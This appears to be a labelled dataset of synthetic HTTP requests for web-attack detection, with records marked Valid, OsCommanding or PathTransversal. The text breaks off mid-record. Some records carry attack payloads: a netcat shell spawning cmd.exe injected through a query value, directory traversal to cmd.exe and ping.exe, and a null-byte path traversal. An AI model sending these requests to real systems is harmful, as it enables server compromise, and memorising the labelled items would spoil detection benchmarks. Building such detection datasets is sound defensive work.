GET /sJ-VtFGKoO8P2/Y7/edN7HW6CXVi6pn0V/emtewcbmkuet7molOys/dropuwNhomehx5jxlqP/oTcd_rvXwQ39pVExw.nsf?a7raoeerd=%2F1Henaonrar&WNbao=icpRjc1r%40HZ&be3=7207&Agrenbsn=t5H6hCY8X&onesu=%7C+++++shell%28++++%22cmd+%2Fc+++c%3AInetpubwwwrootMSISSnc.exe+-l+++-p++++4670++-t++-e++cmd.exe+++%22%29+++++%7C++%27&imthlJEwufxeis=emochascriptudDi%24t4sdg&tkstasptDn=raSim1F&losoto=701&uconfribd=oBq0N.&Destruplec=tmt-+w8ri3betweenusr%5CunionRt9dur&8negAsecrm050=mxKdtiietalueety&hdenTrstencw=4365157&xp_7VVDn=217&8n2qcrlogI=veai47tI8teY HTTP/1.0
Host: www.e3see.it
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: w-tai7n;q=0.3
Cache-Control: max-stale
Client-ip: 112.112.39.6
Cookie: Oenoea725ri=fnptgst$n;tnemz=7ycekbO;pall=45969
Cookie2: $Version="51"
Date: Wed, 16 Feb 05 08:09:43 UTC
ETag: "15WRkN9JUW7JXa-Rohbh"
Expect: oxde
From: zeiTo@a5ng.biz
If-Modified-Since: Thu, 13 Jul 06 18:21:01 GMT
If-Unmodified-Since: Fri, 31 Jul 09 01:41:52 CET
If-Match: *
If-None-Match: "x_4jj.q1t-TWghFYU"
If-Range: Sun, 01 Mar 09 09:29:57 GMT
Max-Forwards: 702
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: NTLM YWRmcmNpZ2gxbjhhQzVucnpjZ2l0YWxzb2R5cm9ybmFmcm4=
Authorization: knwa2 hhrais7=2pEA
Range: -2,66-,4884-
Referer: http://qnenEm.ch/iUTu/Ctad.mdb
TE: chunked;q=0.1,deflate;q=0.0,trailers
Trailer: If-Modified-Since
User-Agent: w1te1i
UA-CPU: Sparc
UA-OS: Linux
UA-Color: color16
Via: rost5/2.2 123.53.16.166, FTP/8.9 www.tnsas.tiff
Transfer-Encoding: e9ne; hehi=9u86ddze
Upgrade: bhpt/6.9, lidal/7.4, mtrc/0.1, r7Z5/0.6, 0ujeIe/8.6
Warning: 422 www.hrhl.png "selsiuieia" "Thu, 06 Sep 07 15:49:14 GMT"
X-Forwarded-For: 193.167.35.201
X-Serial-Number: 2420868137853987546
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36659
Start - Id: 2584
class: Valid
GET /ad/h5TT64HWk7o.tiff?s94nhsd=iradminun&tajuarzqea5e=C+tem&teu=ietelneteuf%3B%25i%7C&avbX=531 HTTP/1.0
Host: 44.219.150.197:7
Connection: close
Accept: text/*
Accept-Charset: euc-jp;q=0.0, windows-1257;q=0.2, iso-8859-5, iso-8859-5, euc-jp
Accept-Encoding: deflate, identity, compress, identity
Accept-Language: EtZ6Pa-y;q=0.3
Cache-Control: no-transform
Client-ip: 55.106.123.246
Cookie: llplyE=60;hlib.dyvn=xp_;esn3j=a7lgpfoH2e'r;eI6paNneNm=gw
Cookie2: $Version="64"
Date: Fri, 31 Mar 06 08:22:17 CET
ETag: W/"VIXU5KySQEy1khxcK0P"
Expect: 100-continue
From: nenonte@ily8ueedor.uk
If-Modified-Since: Tue, 12 Apr 05 24:07:49 UTC
If-Unmodified-Since: Sat, 12 Sep 09 18:13:53 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 19 Jun 04 14:56:21 UTC
Max-Forwards: 3
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: NTLM d3Nlc245ZW11cWFIaHRlY2x3ZnRNd0tlZ2RkbmFvN3hzbnI=
Authorization: qsiu cptrzbka=gdqrh4
Range: 9-6,46-1
Referer: http://www.xlstJo.fr/u1skede/a3agoc/ashDu3pe/oteriQaa.rar
TE: trailers,chunked
Trailer: Referer
User-Agent: Mozilla/0.3 (Machintosh; U; PPC Mac OS X 6.1; la-rr; rv:2.6.2) Gecko/97689403
UA-CPU: PowerPC
UA-Disp: 0486,5217,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 6067x8441
Via: 0.2 104.153.91.231
Transfer-Encoding: identity
Upgrade: hutie/7.1
Warning: 852 www.tmttloo.html "nksortaobujtnde9N" 
X-Forwarded-For: 254.65.44.244
X-Serial-Number: 77079667
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 2584
Start - Id: 9996
class: Valid
GET /4i/gMe/bawqkNU@-/uVckSH9ZB@jRfhj/n0K4p/rlasCAnit6utle/dRd6ivA/6KvZk2Q/-@https.cgi?o0vYhaving2X=sby+&zbph=al&yt=17944&Hgho4KFhGOZ.=ofoOisedsa&afo=21909581&adoeodih2=18&do=2570&tn=4536774579&Otm3TH=cucdiptriaod%40dv HTTP/1.0
Host: www.ytsaac81.it
Connection: close
Accept: */*
Accept-Charset: big5;q=0.7, koi8-r, koi8;q=0.1, isiri-3342;q=0.7
Accept-Encoding: *;q=0.6
Accept-Language: TwTr-eode;q=0.9
Cache-Control: no-cache
Client-ip: 225.120.28.138
Cookie: _gaccess_logeS=36417;hfmjyeadv0lsnBe=;gsN;pl=sMn e;s8yenids=hc;nm=69463;@.U1IUncj=hZ2cfInP
Cookie2: $Version="53"
Date: Sat, 15 Apr 06 10:59:53 UTC
ETag: "309pP6mElF0xbr1pH"
Expect: 100-continue
From: wsO7end1@rfmr.fr
If-Modified-Since: Fri, 28 Mar 08 23:39:54 CET
If-Unmodified-Since: Sun, 16 Jul 06 01:31:21 GMT
If-Match: *
If-None-Match: "qxog2hUf962JuxelNX-5"
If-Range: Wed, 02 Apr 08 11:26:55 GMT
Max-Forwards: 396
MIME-Version: 9.6
Pragma: vtm='svs'
Proxy-Authorization: NTLM N2k2YUpsbG5hbW9hcnJyZUJ1bm4zeWk5cml2YXNvbWFpaHRpNWNkZWRob2lU
Authorization: Digest opaque="tl3ni"
Range: 7-,1-2,575-73
Referer: http://zKoeoix.ch/6rlrett/cmes/lwaqip8e/ra0me/dnotok.exe
TE: gzip;q=0.7,trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/4.3 (X11; U; Linux i386 6.8; lv-aj; rv:2.5.6) Gecko/76026669
UA-CPU: Sparc
UA-Disp: 0205,052,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 6267x971
Via: HTTP/2.6 www.0nsece.js, 6.7 www.oV56nmg.jpeg, HTTP/0.7 233.207.123.145:520
Transfer-Encoding: compress
Upgrade: b2bhql/3.8
Warning: 190 96.212.144.39 "6eoaBieotasga" 
X-Forwarded-For: 48.85.205.201
X-Serial-Number: 7198158285326670
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9996
Start - Id: 2233
class: Valid
GET /qCrsamt1Mw/CUdNTm189ls1inT/lebljqtjdnewln.cfm?varyls-N=8&InoderKaj@G1hs8=eABGzzMXX-Wm&usrkTrD5rqSYN7=021627655&dTtbrpsnhhtsh7=8%27%3A8xtermres%5Bsh4q2&pOUOpQcopyg3=ss%26&SrqahsOborsetoi=677&zlA4.=veO0oosns&c1utttr=sCZ5._-gZ&tphxoNmihuae7=osvbmyt&lronrmd=winnt%27&YtN.h0taq=iezhy6niz HTTP/1.1
Host: www.AZ3lpes.st
Connection: close
Accept: application/*;q=0.3
Accept-Charset: iso-8859-4, windows-1250, x-mac-ce, iso-8859-6, x-mac-japanese;q=0.2
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 124.21.115.181
Cookie: N_2zBE0=cdf;iseobn5t=0aya;AcarWitste8=a6b;1iarda=|ossid;RbI612lboot.iniJ=bodyslah;EHa=005
Cookie2: $Version="1"
Date: Sat, 11 Apr 09 17:52:45 UTC
ETag: W/"imUuruLB1HYFSFxpGK"
Expect: 100-continue
From: tnaDi@steaaaE.be
If-Modified-Since: Tue, 28 Nov 06 18:12:54 GMT
If-Unmodified-Since: Mon, 09 Mar 09 11:36:28 UTC
If-Match: *
If-None-Match: "DGXpCyanTU-MLcbc"
If-Range: Wed, 08 Mar 06 19:17:46 GMT
Max-Forwards: 545
MIME-Version: 6.8
Pragma: t=aaiiogib
Proxy-Authorization: Digest response="4216772A5CecEFaA8c9aAfE01bB8C2cc"
Authorization: leeam ihhdoeon=ytpp
Range: -9799,98225-
Referer: http://tili.cz/neies.sh
TE: trailers
Trailer: If-Modified-Since
User-Agent: eeRaiOttmWcAse
UA-CPU: 68000
UA-Disp: 006,895,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 709x4078
Via: daTr/9.9 www.mecTtt.js, HTTP/9.0 77.55.45.72, HTTP/2.6 71.70.38.164:54
Transfer-Encoding: gzip
Upgrade: uadh/3.9, esa/6.4
Warning: 986 22.139.28.204 "6desddaxYcZe9" 
X-Forwarded-For: 2.94.110.211
X-Serial-Number: 92243859196
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 2233
Start - Id: 223
class: Valid
GET /ahGstej3heuShtefreo8/ixp440Rti7anl/0xjvaUP./eaNbg4uNV-nxvN/2qDe6Kgb4/dMdeleteCetB@m4havingGSr/eGraHuDuNpq4lWi/6mZMmfyt/azUC@PcstMzI/php_Ql1N/enAtes6oph.msf?W_S0lsA8bgsoundsL0=1695168&mSns7Mfloiyrn6=TmtatTzcdpt&kdlrmzgvy8ees=+%7C&v2hoNew5hvnn=IehwEeste0e6roLe&RirsEioti=atdocument&mkJa=xp_tos+&jEe0gni=aSn&easod=linkc&auzns=tkgO5hfil&fooMu=+a1&s3s9=080&ewindow.opengroup bylocation0=v&RrroyeotrIbaree=6didm0tfGhea HTTP/1.0
Host: 56.144.178.160
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: x-mac-cyrillic, big5;q=0.8
Accept-Encoding: *
Accept-Language: hhh1itve-an, rr-miwIsJl;q=0.0, nl8-oR;q=0.9, ti2ioi8-tumr, Yt-td84k
Cache-Control: no-store
Client-ip: 99.49.237.73
Cookie: oiie=0;8Gt-2-BPbc=2096139360;n0fej0axalSuai=84629;hbtnsntr6d6H6S1=7resol)forme
Cookie2: $Version="1"
Date: Fri, 15 May 09 20:31:29 CET
ETag: "3bWlFV3YHe@Xuz5Yh"
Expect: 100-continue
From: 0doILoeo@uhagi7pind.be
If-Modified-Since: Mon, 07 Nov 05 12:03:19 CET
If-Unmodified-Since: Wed, 27 Aug 08 23:01:31 GMT
If-Match: *
If-None-Match: "865hT2jUjD@nE09"
If-Range: "tVw1ve2DD6rJ_F1"
Max-Forwards: 5829
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Basic ZXRlc2c0OmFwaWNn
Authorization: Basic bG4xcjphM2VUcmY=
Range: -6,7844-
Referer: http://www.ibin2n.biz/wtaz0q/utAnlse/kzrtj.css
TE: deflate,deflate,chunked
Trailer: From
User-Agent: m5eseddydn
UA-CPU: StrongARM
UA-Disp: 0159,402,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 4314x599
Via: 3.5 www.NNar.htm
Transfer-Encoding: compress
Upgrade: tden/0.3, ytuoof/6.0, Hl57r/7.7
Warning: 582 65.217.95.237 "athescdhZEt" "Fri, 04 Nov 05 16:53:44 UTC"
X-Forwarded-For: 73.229.35.89
X-Serial-Number: 5671103090812
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 223
Start - Id: 2282
class: Valid
GET /aW@IDrQIV.htm?I0XRhome=ne&7sToituame=teN6enhtfahna&emnsntEi=avlssato9twflmi1S HTTP/1.1
Host: www.cmrtaih.cz
Connection: drtotln
Accept: audio/*, text/html;q=0.9, video/*;q=0.5
Accept-Charset: us-ascii;q=0.5, koi8-r, x-mac-turkish;q=0.3
Accept-Encoding: *
Accept-Language: antyeo-oEi, ysrt-l0h1;q=0.6, nnc-iisi, agTf-Ksyen;q=0.4
Cache-Control: no-transform
Client-ip: 47.70.31.63
Cookie: oG@jUI=rORVe;l60tpiTu6g5=bg?wn9sT9u;1Z3GlinklLKPw=mdiirkAtil7esdo;sm=f2w9samefdrtoa0@;7Kdttunohe=HdgnTphZzehIm6;8PKLgJ-sock_streamny=e0hdiet%imo0aahib|
Cookie2: $Version="6"
Date: Fri, 22 Oct 04 19:25:00 GMT
ETag: "czBkLOu.NNn9-8RH"
Expect: 100-continue
From: aetpir@0smuinHo.ch
If-Modified-Since: Mon, 30 Jul 07 20:27:42 CET
If-Unmodified-Since: Wed, 29 Mar 06 11:20:35 CET
If-Match: "e4VnLfNBIyOpQ42"
If-None-Match: "7i4xDfVXt5a6ZU5E"
If-Range: "AQ6d3xpO7..ZAVgYu"
Max-Forwards: 88
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: NTLM ZG5vdFJzaVJyc3V0cGVzcjE1eDJ0b2hpY3lhbW15b2VlYWYyb29kYQ==
Authorization: iuSil tlms=lSmdsiVg
Range: 8-
Referer: /jiyjdeaj/RooyeZtu/opjses/sateme.cfm
TE: deflate,deflate;q=0.2,trailers
Trailer: User-Agent
User-Agent: Mozilla/9.0 (Windows; U; Windows NT 4.2; fr-i7; rv:7.3.5) Gecko/83616508
UA-CPU: MIPS
UA-Disp: 090,2073,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 6264x742
Via: 8.0 www.Dtte1hpb.shtml:70
Transfer-Encoding: compress
Upgrade: aas/0.1, gEh/7.5, vse/8.0, eear/9.2, ceedn/2.4
Warning: 559 253.190.218.198 "Hoenmbidea3mSi" 
X-Forwarded-For: 191.123.48.69
X-Serial-Number: 61486796053346804
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 2282
Start - Id: 43726
class: OsCommanding
GET /cgi-bin/../../../../../../../WINNT/system32/ping.exe 127.0.0.1? HTTP/1.0
Host: www.0ogtuem.biz:80
Connection: rfonaaum
Accept: */*;q=0.8
Accept-Charset: x-mac-cyrillic;q=0.6, isiri-3342, iso-8859-2, x-mac-arabic, iso-10646-ucs-2
Accept-Encoding: identity;q=0.7
Accept-Language: *;q=0.2
Cache-Control: max-stale=6169
Client-ip: 105.144.118.141
Cookie: tzddhpp7onteean=rg;eaoN1tdlh=75;@sY11bfck2GZ=eaeagp9ureaccepth;2tinqplqiTel=2116;bduMtt6ostG=ilwmh
Cookie2: $Version="378"
Date: Tue, 16 Jun 09 23:49:45 GMT
ETag: "Y.s@uzSrUj7Z9Du_FHr"
Expect: 100-continue
From: uhbqiisi@rmieagr.org
If-Modified-Since: Sat, 26 Apr 08 20:21:42 GMT
If-Unmodified-Since: Sun, 29 May 05 24:17:33 GMT
If-Match: "jHIL3cf8xKPp@wU"
If-None-Match: *
If-Range: "RjeEnHTVkmsKZIAa"
Max-Forwards: 7696
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic aXp0aTphM3RMaXJ0
Range: 7008-71
Referer: http://rna0aA.gov/cailrkH/ng0ohuH/baalel/7zEa/eOo9eecr.css
TE: chunked,trailers,chunked;q=0.3
User-Agent: Rltho/6.5.1.6.8
UA-CPU: 68000
UA-Disp: 603,315,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 337x2229
Via: HTTP/6.5 www.ngmt.jpg:66
Transfer-Encoding: identity
Upgrade: 2Ytn/5.0, a8qtt/0.1
Warning: 140 www.rnisshet.gif "tr2eit" 
X-Forwarded-For: 251.245.152.34
X-Serial-Number: 601406
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43726
Start - Id: 6330
class: Valid
POST /XJLUTIMDR.wFNG/1obQid@hqxeumRpSyJKI/d7.D4N9Ck/tuecents/VB4Z.php3? HTTP/1.0
Content-Length: 159
Content-Language: tyueeXi,ranlc,an
Content-Encoding: gzip
Content-Location: /6qcGv1/h8Aahw/oe0on/PxghsgS9.php3
Content-MD5: c2U4YW52ZW1sc0F2bExuYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 03 Nov 09 09:19:26 CET
Last-Modified: Thu, 03 Jul 08 02:02:55 CET
Host: www.ehei.com
Connection: cxwS
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=66
Client-ip: 95.211.44.64
Cookie: oaeq0anncik=er9kuiiabzlti;opl4dttmos=lsv a/nOcidlno'n;tetiom2=640880
Cookie2: $Version="92"
Date: Tue, 10 Feb 09 14:05:28 UTC
ETag: W/"D1@JXe6T3D2nrJU"
Expect: ftNU1=4o9e;woinqeV
From: ai8tEt@dHaaiz4iys.net
If-Modified-Since: Sat, 07 Oct 06 16:09:25 GMT
If-Unmodified-Since: Sun, 30 Sep 07 22:22:43 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8342
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: NTLM bWN6YTNlbmV0TnJldG5pb2VudWVzdW42amU1cnJwZnNwZWxuNWZseXRzY2Fs
Authorization: NTLM b290c2V0c3NXYWJjZmxnZGFsc3MwTUhtdGVlYmhva3RTZTRjdExpbG5laWUzdA==
Range: 137601-
Referer: /megp9a/rsdnnedn/9h8bgotP.pl
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/5.0 (compatible; ee1le; Windows NT; 7ree9n; dweioOejei; oedLeeb4)
UA-CPU: PowerPC
UA-Disp: 373,864,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9611x0201
Via: 4.2 www.O8627i.css, eua4su/4.7 166.198.80.199, FTP/7.1 206.48.48.5
Transfer-Encoding: deflate
Upgrade: mnlEe/6.9, ss49D/6.8
Warning: 839 www.tnrahe.tiff "deguewo" "Sun, 11 Dec 05 01:27:46 UTC"
X-Forwarded-For: 150.186.242.245
X-Serial-Number: 9387717978
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

eradOtetue=14n&98_wS=7245&divXHMBibJ=eZMyr&WKDj_replaceP=smooo2&trxk=609404&iw4fenebeourrU=eJbody%c&r7ca5eezeseb=Coo|akt5tad&pJs=208277670&feitHnsud=d<te

End - Id: 6330
Start - Id: 44985
class: PathTransversal
GET /let2eux1eb7z0Pdes/ba/atdthakedzdenainfmne/d0piel/mWaf/eq1ee5D55oaabet0/g2iT/Ehoziinyee3tt/tVL4e60b8N.asmx?o7eholBdaAce25=..%2F..%2FUBData%2FMembers%2Fmembers.grp%2500 HTTP/1.1
Host: 218.36.246.200
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: x-mac-roman
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.7
Cache-Control: DwasirA='Q'
Client-ip: 223.133.197.156
Cookie: diah=o+N9e9+Es ;qqs
Cookie2: $Version="1"
Date: Sun, 11 Mar 07 12:44:15 CET
ETag: "-pVdK.sD-T.vbr32NTvg"
Expect: 100-continue
From: esra@5dfeusd9Lo.de
If-Modified-Since: Fri, 09 Sep 05 20:21:38 CET
If-Unmodified-Since: Tue, 21 Mar 06 23:00:47 GMT
If-Match: "U.6Cp08EVmeBk2O0"
If-None-Match: "3MM8ouQr5OiK1-pX"
If-Range: Thu, 04 Dec 08 06:00:48 CET
Max-Forwards: 82
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Rirat vhs2bemi=hrsmwha
Authorization: Digest qop=sarR
Range: 73-,999598-14093
Referer: /nHias.jsp
TE: chunked;q=0.0
Trailer: Accept-Encoding
User-Agent: 6aeeRlos/0.2.5.0
UA-CPU: 68000
UA-Disp: 272,747,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 298x3014
Via: 0.0 157.187.125.92, 4.8 www.rrtdsmo.js:084, gvou/6.7 64.107.225.99
Transfer-Encoding: gzip
Upgrade: aEeIr6/5.8, vitna/3.7
Warning: 066 www.nilrhde.jpg "jrIghnmascnrodusoxo" "Thu, 06 Oct 05 03:19:48 UTC"
X-Forwarded-For: 21.25.17.174
X-Serial-Number: 8606404239
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44985
Start - Id: 36557
class: OsCommanding
GET /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.msue0.net:80
Connection: close
Accept: */*
Accept-Charset: x-mac-hebrew;q=0.5, x-mac-greek, windows-1253;q=0.6
Accept-Encoding: 
Accept-Language: m-rd;q=0.3, a0-dafn, iepcnsrq-hSe;q=0.3, eweg-gxoiaieh;q=0.8
Cache-Control: no-store
Client-ip: 197.131.59.208
Cookie: eaase3loilmrio=588;ttn=215;n6u=5rt3.7Sp1J;wxTcD=cks;VeesexgR=uneeperl O[Ic4m%t;or7y2otR=94
Cookie2: $Version="25"
Date: Wed, 15 Jun 05 05:26:31 GMT
ETag: "._sHr99T4AKY.QbUteoU"
Expect: ft7A=n8gttEd;crsu
From: h8IMoanr@hlhircha.ch
If-Modified-Since: Sun, 12 Nov 06 19:21:23 GMT
If-Unmodified-Since: Wed, 04 Oct 06 09:07:20 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 63
MIME-Version: 5.7
Pragma: Q='faaoepns'
Proxy-Authorization: Digest nc=Ad95328B
Authorization: NTLM cmlvb2Fvb2luaGRzaGp0czdvd2xvYWhrNDR0Z2VhbGEwYXppdGk0Ym5kc2tB
Range: -7292
Referer: http://elta.uk/iudpp/ot4o/otte6.pdf
TE: deflate,gzip;q=0.0,gzip;q=0.3
Trailer: If-Match
User-Agent: tutlfIThtaurbnrj
UA-CPU: Sparc
UA-Disp: 1693,583,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 547x5195
Via: enogs/8.6 www.tetqra.jpg:2, 3.7 196.40.24.71, 6.1 www.2pocs.jpeg
Transfer-Encoding: identity
Upgrade: syjne/7.2
Warning: 384 103.114.33.177 "eR8ioli" "Sat, 15 Oct 05 19:32:06 GMT"
X-Forwarded-For: 232.88.214.55
X-Serial-Number: 33496662681000
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36557
Start - Id: 25896
class: Valid
GET /iWR1TMPwAahw0s/lObtPQsnKK/wKf-L/gstdinmeB.tiff?tsccyke=43&eeidso=9HhYL3HoLhpn HTTP/1.1
Host: 193.152.29.184:80
Connection: near
Accept: image/gif;q=0.7, text/*, application/*;q=0.4
Accept-Charset: x-mac-japanese;q=0.4, x-mac-chinesetrad, iso-8859-8, ks_c_5601-1987
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=47
Client-ip: 175.49.121.95
Cookie: q5dreenrB=4k2semail'eet;la=t5u3worni;drr5sem5Tho=wmLStIL@z;ZrAR=1nu?c9rinptnc8c;fO5Qras0on=eehp
Cookie2: $Version="208"
Date: Fri, 16 Oct 09 24:05:42 CET
ETag: "6h4JtYPXoppx16y-"
Expect: 100-continue
From: bonsaIe@heieAmhcTA.gov
If-Modified-Since: Wed, 03 Aug 05 19:18:05 GMT
If-Unmodified-Since: Thu, 09 Aug 07 15:43:52 CET
If-Match: "q2Dx-CA2QHYFajKy"
If-None-Match: "p.4w8tVB.dv0wGUv2j"
If-Range: "zWDx_kcLlVR1vsM-S8"
Max-Forwards: 9
MIME-Version: 8.9
Pragma: eeaao8=D
Proxy-Authorization: vtiloi eeinl7=efedebmP
Authorization: NTLM cmZlZXRsbGVpdGlwZ3ltdEh1MXNlejJlMnh5cWxpbWw=
Range: 112-242,-6,0-
Referer: http://rmP9va.st/r5ras92t/a1sf3ou/nasotka/Meotr.php3
TE: gzip,trailers,chunked;q=0.2
Trailer: Cache-Control
User-Agent: ise3l5/7.6
UA-CPU: x86
UA-Disp: 291,6267,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 069x973
Via: 7.4 161.158.67.248, iai/3.8 214.28.30.134:45, 1.5 www.d3Vhte.tiff
Transfer-Encoding: compress
Upgrade: v4b/9.4, idShiq/5.7, hdmhO/3.7
Warning: 129 www.Etst.shtml "dtbd03r" "Sun, 21 Mar 10 18:48:29 UTC"
X-Forwarded-For: 11.41.211.10
X-Serial-Number: 1807971586692
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25896
Start - Id: 18929
class: Valid
GET /1pnOluret/r78zfVDcGx-imU7L/metadDYWwlinkkOE6/7cAhe/hRvP/Riqybrdlink/eor7/NtIae2E/giateshobraspeom.jpeg? HTTP/1.0
Host: www.ur5nl1eedi.it
Connection: keep-alive
Accept: audio/basic;q=0.2, text/*;q=0.8, application/*;q=0.9
Accept-Charset: x-mac-korean
Accept-Encoding: gzip, gzip;q=0.1, identity, identity;q=0.2, identity
Accept-Language: ashd1Rco-mdzJudO;q=0.0, e2eetkbt-Ge;q=0.4
Cache-Control: max-stale
Client-ip: 229.0.200.112
Cookie: awtdnryIl=pbq7yetosinsed;oelLwitiuodw=xdbe
Cookie2: $Version="63"
Date: Wed, 08 Jun 05 20:19:51 UTC
ETag: W/"su.O@LDx_sPJFRT9"
Expect: oetsEour
From: uieecnr@ncVpni.com
If-Modified-Since: Fri, 07 Oct 05 17:58:02 UTC
If-Unmodified-Since: Sun, 01 Oct 06 14:23:50 UTC
If-Match: *
If-None-Match: "1c0JHlTUgOYtO_Moe7"
If-Range: *
Max-Forwards: 15
MIME-Version: 6.2
Pragma: csnanE=i0y6dl3
Proxy-Authorization: Digest nonce
Authorization: tl6e uhTo=sctteo
Range: 5-,2-99262,-0
Referer: /zFstoap/wrussSce/WUmtnt0a/jdtoi.jpg
TE: gzip;q=0.5
Trailer: If-Match
User-Agent: bcnI2ti5Od
UA-CPU: Sparc
UA-Disp: 112,418,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 905x897
Via: uwes/3.0 218.74.5.162, eiheae/2.5 124.64.149.141, 5.2 www.wGpt.js
Transfer-Encoding: oewehh
Upgrade: ensdmo/4.9, 8gvNs/8.5, evntyz/9.1, 7nshfi/4.0
Warning: 206 www.rcar.js "iacalyetteu3rehb" "Sat, 27 May 06 22:33:16 GMT"
X-Forwarded-For: 85.156.7.96
X-Serial-Number: 27260320301
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18929
Start - Id: 14863
class: Valid
GET /edrh/epfOAmiaf6FTunoi/oilroseo290bin/cZ4vM5g3/c5y8hu4/loa/gtt_1x1eeoW2U45tNkrl.nsf?gmelcottc9n=64289&o0aqost=tr538on0do&tRNAci=tJsI5W0&ncaocqstthvH=eR8ei&cRecini=7&9tsB=080430&Eayd3tl5fabSs=1&fOwobewyxbatet=arNY%3Cus+7&eodtbetb=mo+%24n%25umchyh&lyiicttx=886&xntaltOe8t=79311 HTTP/1.0
Host: www.sgm3uWi.ch
Connection: close
Accept: video/mpeg;q=0.0, text/html
Accept-Charset: utf-8;q=0.7, macintosh;q=0.9, iso-8859-5, iso-8859-9;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 138.69.215.50
Cookie: tTem3peIgoedw=z6i
Cookie2: $Version="63"
Date: Wed, 27 Jun 07 05:14:07 UTC
ETag: W/"7Ww2LqRBAnXCQUCD93"
Expect: 100-continue
From: dtayi7@nIdTra.gov
If-Modified-Since: Tue, 11 May 04 02:02:59 UTC
If-Unmodified-Since: Wed, 19 Apr 06 02:18:25 CET
If-Match: "ryvV2.NYPUoW.EI"
If-None-Match: "A@i7kQEB8.J8wN0G"
If-Range: Thu, 04 Dec 08 17:31:04 GMT
Max-Forwards: 640
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Basic dGxuYXQ6dDd2T2lyZQ==
Authorization: NTLM N2V4ZW1zd2hvZmFlMGVpaTJJRTdtamJmbmlVZWF0ajNl
Range: -43,-61335,692292-223
Referer: /ejob/5idoyorr/hitde.asmx
TE: chunked;q=0.1
Trailer: Referer
User-Agent: Mozilla/6.7 (compatible; merroA1rn; Win98; Sny5Nw; hmnAFisog)
UA-CPU: 68000
UA-Disp: 872,888,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 923x8805
Via: HTTP/7.2 172.172.205.26, HTTP/8.3 www.zheRas.tiff
Transfer-Encoding: Ebob
Upgrade: orhoc/2.2, Sguidv/0.2, 9Hz/1.4, Qxua/9.4
Warning: 225 184.210.143.62:77965 "ecfsd0heehezcle" "Sat, 24 Feb 07 14:16:26 UTC"
X-Forwarded-For: 121.34.208.174
X-Serial-Number: 883982110
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 14863
Start - Id: 4193
class: Valid
POST /Z7hincludeguwZ4C7844/V9XYR9.3G.htm? HTTP/1.0
Content-Length: 324
Content-Language: olyntalh
Content-Encoding: identity
Content-Location: /nHEyh2/EeyP1e.cgi
Content-MD5: Z2p0b2FlYW9mc3MxbW50cw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 06 Mar 04 19:53:00 CET
Last-Modified: Thu, 13 Dec 07 12:48:27 CET
Host: 68.14.130.25:98179
Connection: close
Accept: audio/x-wav, video/mpeg;q=0.7
Accept-Charset: ks_c_5601-1987
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: 7amnyo=t
Client-ip: 128.131.127.146
Cookie: oaqut=h_g6rFBeRsB0;vt5ee5bml=sGzQs
Cookie2: $Version="21"
Date: Sun, 20 Mar 05 23:51:06 CET
ETag: "j1fHfPd7.Z7MrOHiNjG"
Expect: 6xsMd
From: tewe@gFoteninnd.com
If-Modified-Since: Sat, 08 Aug 09 12:03:47 GMT
If-Unmodified-Since: Tue, 20 Nov 07 11:47:38 UTC
If-Match: "Qv6P5ERF0Dx3tJTrKjk"
If-None-Match: *
